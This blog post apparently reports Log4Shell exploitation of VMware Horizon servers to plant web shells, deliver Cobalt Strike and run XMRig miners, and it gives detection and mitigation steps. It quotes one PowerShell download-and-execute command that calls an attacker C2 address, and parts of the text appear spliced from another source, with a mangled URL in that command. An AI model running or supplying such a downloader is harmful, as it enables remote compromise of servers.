On January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\\SYSTEM (root privileges). According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.

Huntress is continuing to track this activity and this post will be updated with new information as it becomes available.

New Behavior

On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped Huntresses ThreatOps team to new exploitation of the Log4Shell vulnerability in VMware Horizon. This time it was used to deliver the Cobalt Strike implant.

Additional security researchers including The DFIR Report and Red Canary reported similar behavior around the same time—confirming a PowerShell based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83[.]116 for command and control.

iex ((New-Object http://System.Net.WebClient).DownloadString(‘http://185.112.83[.]116:8080/drv’))

At 1938 ET, Huntress started deploying Huntress’ soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. This new EDR capability is based on an acquisition Huntress made in early 2021 and allows them to proactively detect and respond to non-persistent malicious behavior by giving them the ability to collect detailed information about processes.

Initial Access Source

Despite mass exploitation of VMware Horizon to deliver web shells, Huntresses data suggests today’s Cobalt Strike deployments were exploitations of Horizon itself and not the abuse of web shells. This conclusion is largely based on analysis of the PowerShell payload’s parent process where web shell abuse spawns from node.exe, while exploitation of Log4Shell in Horizon spawns from ws_tomcatservice.exe as pictured below. Secure Networkers observed this type of web shell activity trying to execute the xmrig.zip and xmrig-6.zip file. After researching the locations, we found the shells were being run from numerous locations throughout the world on what appeared to be compromised systems.

Here is the file signature that was used:

(366b32c15ff2b30da5cafc1407e6dc49aa4bbecffc34c438302022acd1c00b8e)

Link to the virus total page:

https://www.virustotal.com/gui/file/366b32c15ff2b30da5cafc1407e6dc49aa4bbecffc34c438302022acd1c00b8e/behavior/C2AE

(Rendered in Elastic Kibana with Huntress’ Process Insights)

Mostly this is being recognized as a cryptojacking campaign. One report that we saw showed that the XMRig miner registered itself as a service. This script also avoids detection by using a user-mode rootkit from the C2 (command and control) server. The shell script contains commands which contact the C2 server and download the XMRig miner, configuration file, and the user-mode rootkit. The script then uses the wget utility to get the components mention and chmod to make the components executable. The report also said that the rootkit gets saved as libload.so abd modifies vSphere to run the XMRig cryptominer. The report said that the attacker’s wallet had been paid 8.942 XMR ($1790) at the time of the report.

Detection Tips

For those of you just learning about the mass exploitation of VMware Horizon servers and the installation of backdoor web shells, you should seriously consider the possibility that your server is compromised if it was unpatched and internet-facing. To help you determine your status, we strongly suggest you perform the following actions:

• Run VMware’s Horizon Mitigation tool to report whether there is a vulnerable Log4J library or child_process based web shell present under the installation location with the following command: Horizon_Windows_Log4j_Mitigation.bat /verbose
• Manually inspect/assess the files within %ProgramFiles%\\VMware\\VMware View\\Server\\appblastgateway\\ for the presence of the child_process string as pictured here.
• Review historical records for evidence of node.exe or ws_TomcatService.exe spawning abnormal processes to include PowerShell.

Mitigation Steps

This new wave of coordinated hacking emphasizes the criticality of patching these servers immediately. VMware has produced detailed guidance to help you address these security vulnerabilities.

Should you discover a web shell, VMware recommends you “take down the system and engage your Incident Response Team” to fully assess the compromise. Alternatively, Huntress recommends you restore from a backup prior to December 25 to remove the web shell. Restoring from backups prior to December 25th is what we have been doing so far. With that said, it’s entirely possible attackers exploited CVE-2021-44228 and CVE-2021-45046 to spread laterally within your network so you should proceed with caution.